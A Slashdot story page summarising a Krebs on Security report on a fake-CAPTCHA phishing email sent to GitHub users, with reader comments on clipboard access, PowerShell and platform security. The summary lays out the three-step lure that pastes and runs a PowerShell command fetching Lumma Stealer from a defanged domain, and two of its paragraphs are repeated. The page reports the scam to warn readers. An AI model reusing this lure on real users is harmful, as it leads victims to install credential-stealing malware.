Windows PowerShell Phish Uses Fake CAPTCHA, Downloads Credential Stealer (krebsonsecurity.com) 62
"Many GitHub users this week received a novel phishing email warning of critical security holes in their code," reports Krebs on Security — citing an email shared by one of his readers:
"Hey there! We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue...." Clicking the "I'm not a robot" button generates a pop-up message asking the user to take three sequential steps to prove their humanity. Step 1 involves simultaneously pressing the keyboard key with the Windows icon and the letter "R," which opens a Windows "Run" prompt that will execute any specified program that is already installed on the system.
Step 2 asks the user to press the "CTRL" key and the letter "V" at the same time, which pastes malicious code from the site's virtual clipboard. Step 3 — pressing the "Enter" key — causes Windows to launch a PowerShell command, and then fetch and execute a malicious file from github-scanner[.]com called "l6e.exe...." According to an analysis at the malware scanning service Virustotal.com, the malicious file downloaded by the pasted text is called Lumma Stealer, and it's designed to snarf any credentials stored on the victim's PC.
Even though this might fool some users, Krebs points out that Microsoft "strongly advises against nixing PowerShell because some core system processes and tasks may not function properly without it. What's more, doing so requires tinkering with sensitive settings in the Windows registry..."
Thanks to long-time Slashdot reader sinij for sharing the article.
Step 2 asks the user to press the "CTRL" key and the letter "V" at the same time, which pastes malicious code from the site's virtual clipboard. Step 3 — pressing the "Enter" key — causes Windows to launch a PowerShell command, and then fetch and execute a malicious file from github-scanner[.]com called "l6e.exe...." According to an analysis at the malware scanning service Virustotal.com, the malicious file downloaded by the pasted text is called Lumma Stealer, and it's designed to snarf any credentials stored on the victim's PC.
Even though this might fool some users, Krebs points out that Microsoft "strongly advises against nixing PowerShell because some core system processes and tasks may not function properly without it. What's more, doing so requires tinkering with sensitive settings in the Windows registry..."
Thanks to long-time Slashdot reader sinij for sharing the article.
This is daft (Score:5, Funny)
OMG. Here user, here's the instructions to let me hack your computer.
Re: (Score:2)
Being clueless comes with increased risk in life. This applies to small and big things.
Not quite so simple (Score:3)
The problem is clueless ness isn't entirely what's involved.
Nowasays a lot of modern Captcha ask absolutely trivial tasks ("align the puzzle piece to the image") and don't rely on successful completion of the task, but on subbtle timing of the inputs.
It would be trivial to solve the task itself in a 1-liner in Perl (or in Python for modern kids, but with more spaces), but the sudden jumps and smooth linear motion of the pointer would be going through a classifier that would notice the synthetic origin of th
Re: (Score:2)
OMG. Here user, here's the instructions to let me hack your computer.
Well you say OMG, but the reality is this is how the vast majority of hacks occur right now. Oh look my phone is ringing Microsoft support called me about a virus on my computer, this is important, brb.
Re: (Score:1)
Re: This is daft (Score:2)
I'm sorry, but fools who fall for this have no business being on GitHub at all.
PowerShell for Linux (Score:2)
If you're not smart enough to recognize an 'execute' command, you're not smart enough to own a GitHub account.
With the Linux UI now being Windows-like, does this work (assuming PowerShell for Linux is installed)?
Linux (Score:2)
Doesn't work, for a much more simple reason that is common accross all the non-Windows / non-MacOS world, so not only Linux, but BSD, and everything else:
other OSes tend to be a lot less monoculture.
To try the same scam on Linux you would need to account for the gazillon different graphical interfaces and shells that exist (e.g.: on my Plasma install "Alt-F2" is instead bringing a quick-run pop-up that can be used to run commands) and that's without even starting with the even crazier diversity brough by en
Re: (Score:2)
You're absolutely right, but that only really covers the "CTRL+R" part. Could replace that instruction with "Open a Terminal", with a link to a help page going over how to open a terminal on a variety of systems. Then, you can just have them paste in a command, much like the ones too many people put up for installing things outside of the package manager.
For example, here are the official instructions for installing Signal messaging app on a Debian based Linux system:
https://signal.org/download/# [signal.org]
Linux (Debian-based) Install Instructions
# NOTE: These instructions only work for 64-bit Debian-based
# Linux distributions such as Ubuntu, Mint etc.
# 1. Install our official public software signing key: /usr/share/keyrings/signal-desktop-keyring.gpg > /dev/null
wget -O- https://updates.signal.org/des... [signal.org] | gpg --dearmor > signal-desktop-keyring.gpg
cat signal-desktop-keyring.gpg | sudo tee
# 2. Add our repository to your list of repositories: /etc/apt/sources.list.d/signal-xenial.list
echo 'deb [arch=amd64 signed-by=/usr/share/keyrings/signal-desktop-keyring.gpg] https://updates.signal.org/des... [signal.org] xenial main' |\
sudo tee
# 3. Update your package database and install Signal:
sudo apt update && sudo apt install signal-desktop
Why do we
Re: Linux (Score:2)
The difference is that you came to the Signal website yourself for these instructions, and you had trust in Signal. Compare this to executing similar instructions from a random website that you visited due to a received email.
It's really the same as installing some non-free Un*x program by running some downloaded .run file, or in Windows, an .exe file. You need to be trusting the source of these files.
Even your Debian system can pwn you by running apt-get upgrade in the unlikely case that the Debian server
Re: (Score:2)
The difference is that you came to the Signal website yourself for these instructions, and you had trust in Signal. Compare this to executing similar instructions from a random website that you visited due to a received email.
But it doesn't need to be done in a way that is so similar to how this exploit is done, as I noted above.
The "from a random website" is the part where phishing is involved. People are tricked so that they don't know it's a random website or random email, but like someone they should trust. The domain could look very similar to "signal.com" and be sent in a phishing email. And if the process looks just like the process that a security focused app or an enterprise level VM app uses, then they have less reason
CAPTCHA (Score:2)
You're absolutely right, but that only really covers the "CTRL+R" part. Could replace that instruction with "Open a Terminal", with a link to a help page going over how to open a terminal on a variety of systems.
Bear the current context in mind: we're speaking about hacks that maskarade as Captchas, and extremely bored users who have been used to type random keys and click on trivial stuff with their mice as a modern form of input-timing Capchas.
Technically, yes: you could get a clueless Linux user to install an exploit by asking to open a terminal a giving documentation to how to install this.
BUT this will NOT be usable in the context of pretending to be a Captchas.
At best, this could work by pretending to be inst
Re: (Score:2)
You wouldn't need powershell, the same thing could be achieved in bash on linux just as easily. The difference is that linux users are on average more tech savvy and wouldn't fall for it.
What it really shows is that neither windows not linux are suitable systems for such users, and they would be better off with a walled garden system like ios or chromeos.
Re: (Score:2)
What it really shows is that neither windows not linux are suitable systems for such users, and they would be better off with a walled garden system like ios or chromeos.
... because you can't open a terminal on either of those??? <HINT - you can>
Re: PowerShell for Linux (Score:2)
Don't have ideas to Ap*le about what user freedom to remove next to protect the dim-witted.
Re: (Score:2)
not a windows dev, but I think i fell for a joke Ctrl-W once, and almost for an Alt+F4. It's one of those things that if you haven't encountered and if it hits you when you're not paying full attention or something, i think it can get you. especially since Ctrl-V since prob many people don't even think "Ctrl-V" for paste ... they think "paste".
Nowadays i think there should prob. be more default indication of what's in the clipboard / when the clipboard content changes. (although there is some sens
Re: (Score:2)
I'd recommend Ditto [github.com] clipboard manager but it's Windows-only. It is open-source, so a Linux dev. could port it, if one wanted. ;)
I found so-called clipboard managers to be snippet managers / keyboard macros. That is, one has to move data in and out of a database, not re-use/replace the data in the clipboard. I am interested in an Android applet that changes the clipboard contents, similar to Ditto [sourceforge.io] (official web-page).
Probably works well on the average Windows "dev" (Score:4, Insightful)
These people are not very smart, after all. That apparently some want to remove PowerShell as a "countermeasure" just makes this even more obvious.
Re: (Score:2)
That's the typical clueless kneejerk response, block/remove something useful instead of learning how to use it properly.
Re: (Score:3)
Re: (Score:2)
You laugh, but the Australian Information Security manual wants systems to remove "script execution engines" from all unprivileged users -- including both PowerShell and the more traditional command prompt, which Slashdot/Cloudflare will not let me name, as specific examples (control ISM-1491).
Re: (Score:2)
Well, MS Office is basically a giant scripting engine. So is basically any web-browser. I guess somebody wasted money on "experts" there.
Re: (Score:2)
There are a bunch of security controls in the Australian ISM about the scripting engines inside Microsoft Office and about "active content" from the web, in addition to the one I mentioned.
When you assume, you make an ass out of yourself, at least.
Re: (Score:2)
Australian Information Security manual wants systems to remove "script execution engines" from all unprivileged users.
I had a crappy sales job long ago with a locked down Windows NT workstation, limited icons, and permissions. I pulled up Internet Exploder and typed cmd into the address bar, much hilarity ensued. Don't know if they could have locked out the net command too, but they hadn't. The RDP used didn't like a full screen cmd window so it didn't register, probably why MS killed full screen later on. Maybe they could kill the shell but I doubt it.
Idiots (Score:5, Funny)
Why was removing PowerShell even suggested? Why not just give instructions to remove the web browser and the email client? Problem solved!
Re: Idiots (Score:5, Funny)
Have you tried to uninstall Edge lately ?
Re: (Score:3)
It's actually pretty easy to completely uninstall Edge and any other unwanted Windows programs [ubuntu.com].
Re: (Score:2)
Followed it, but now Office won't install. Something went wrong. /s
Re: (Score:2)
Or better, just remove the Internet. :P
This is a big flaw in many OSes (Score:2)
Android, iOS, ChromeOS and even macOS got this right by providing cryptographically immutable base systems with the majority of running processes forbidden from touching users private data by default. Executing malware on these systems is no
Re:This is a big flaw in many OSes (Score:4, Interesting)
Every system should have implemented mandatory access controls to mitigate this type of thing by now.
It's not about access control. Both Windows and Linux try to separate administrative access from user access and for those who know the difference and how to use them, they pretty much work. But you gotta realize that a user must have access to their local directory, should be able to download files, and be able to execute them. If you don't allow them to do that, then you're not going to be considered a "user-friendly" O/S.
It shouldn't be that easy to get at the private data of end users without them knowing what application is requesting access, and them directly approving said access.
If a user is dumb enough to follow instructions as introduced by this hack, they surely are going to just answer "Yes" to any prompt that pops up.
Android, iOS, ChromeOS and even macOS got this right by providing cryptographically immutable base systems with the majority of running processes forbidden from touching users private data by default.
I suppose that's reasonable for self-contained applications, like those on the OSes you mentiond. But on the PC we tend to run many things which fall outside of that realm. Case in point, on the PC there's an application called Minion which doesn't really have its own data, but its purpose is to supplement other applications by allowing you to download plugins for them. And that's just one of the applications I use that are on my menu bar. Treating Windows or Linux like Android and iOS really does them a disservice.
Disclaimer: I am not a macOS user, so I really don't know how that handles this scenario.
Re: (Score:2)
a user must have access to their local directory, should be able to download files, and be able to execute them.
The problem (not only for naive users, but for all users) is how to know whether the executable they are downloading and executing will do what they expect vs something malicious?
Sure, in a scenario like this it is easy to scoff and say that the user should have picked up on the obvious clues, but it's not difficult to imagine a scenario where the methods for convincing the user to install and execute a malicious executable are sophisticated enough to fool even the most knowledgable user. For example, one
Re: (Score:2)
You touched on 2 attack vectors. One is software from people you don't trust. For that, you're truly taking your chances, because you don't know if it'll take your document directory and upload it to some place. Heck, it even can be ransomware. But, in general, if it's from a place you trust, you tend to run it anyway. The solution to this is checksums, like those for various Linux distributions, and code signed by an authority you trust. The other scenario is you download something from a place you t
The solution is a bit more than that (Score:2)
Regarding the trusted-but-compromised scenario, even if the deve
Re: (Score:2)
I would say that the PC is an "open" platform while iPhone is a "closed" platform, with other platforms being in various places on the scale between the two.
The more "open" a platform is the more things a user can do with it, which opens up more risk to an uneducated user being exploited through social engineering, and there's nothing developers can do to mitigate this without compromising the openness of the platform. Either the user should move to a more limited closed platform for their own safety, givi
Re: (Score:2)
Re: (Score:2)
should be able to download files, and be able to execute them
On a general purpose OS aimed at geeks sure, on a consumer device no they shouldn't at least not by default.
Re: (Score:2)
You are confusing consumer device with appliance. Just because something is targeted at a consumer doesn't make it a locked down appliance.
Imagine your car not allowing you to drive down a certain road because the destination you want to go to is not on the approved list that General Motors has defined. Consumers, non-geeks, absolutely need to be able to download, execute and install things on their PCs. It is what makes them a PC instead a kiosk.
Re: (Score:2)
Regular consumers don't open the hood of their car and change the air filters, despite it being a pretty easy job, and they certainly aren't going to try changing the brake pads on their own because messing that up could easily kill them (or someone else).
They pay someone else to do these things for them.
Regular consumers don't buy a collection of parts and assemble their own car to their own specifications, but there is a niche of people who will absolutely do that.
A general purpose computer is not a suita
Re: (Score:2)
Re: (Score:2)
It's an addon manager for Elder Scrolls Online and World of Warcraft. Much like NexusModManager was for Skyrim and a few other games. Here's more info [mmoui.com].
Websites can change the paste buffer? (Score:1)
Why would websites be allowed to put stuff into the paste buffer?
Re:Websites can change the paste buffer? (Score:5, Informative)
Why would websites be allowed to put stuff into the paste buffer?
Lots of websites place helpful information in the paste buffer.
Go to YouTube and click on the Share button. The shortened URL of the video will be placed in your copy buffer.
Go to Programiz for tutorials. Click the Copy button and the example code will be placed in your buffer.
Some sites disable normal copying but provide a "copy to clipboard" option, then they add their citation to the bottom of the copied text to help you give proper attribution to the source. There are other examples but this should be enough to see that not all clipboard interactions are for nefarious purposes.
Re: (Score:2)
Lots of websites place helpful information in the paste buffer.
Yep. Like "Copy Coupon Code". "Copy One-Time Code" (for use elsewhere). There are countless legit applications of this.
Re: (Score:2)
Yep. Like "Copy Coupon Code". "Copy One-Time Code" (for use elsewhere). There are countless legit applications of this.
Why not simply let the user copy this information the normal way? Hardly legit given the huge potential for abuse, and given the trend that more and more applications nowadays tend to no longer make it obvious when they have lost the selection.
Re: (Score:2)
Re: Websites can change the paste buffer? (Score:1)
Sigh... Ok, I see that now, and the fact that this is abuseable makes me say - as I do far too often these days - "This is why we can't have nice things".
Can't protect against stupid (Score:2)
Subject says it all.
"Prove you are a human" (Score:2)
oh good (Score:2)
What the fuck? I was just blocked from posting this comment [pastebin.com]... It's always nice when your cloud security makes your site unusable.
Why have I been blocked?
This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.
What can I do to resolve this?
You can email the site owner to let them know you
Re: oh good (Score:1)
Holy fuck that's stupid. Par for the course here now though I guess
Re: (Score:2)
You can't post cmd[.]exe in a comment on Slashdot. Bow down to your Cloudflare overlords, for some guy making $3 an hour at Cloudflare decided a simple regex is good security practice.
And their solution is garbage. You can post it using a simple NO BREAK tag, like: cmd.<nobr>exe /d
Example: cmd.exe mountvol C:
Re: (Score:2)
Great one, I didn't think of that myself. Now that's why I'm here damn it
Re: oh good (Score:2)
Welcome to the club of the annoyed by Cloudflare.
This is the price one pays for browsing the Sh!tternet these days, I guess ..
A security vulnerability in your repository. (Score:3)
PowerShell Commands (Score:2)
How do the bad guys always know which powershell commands work in all versions of powershell? I can't seem to ever figure out a way to ACTUALLY do anything in powershell because of how wacky it is.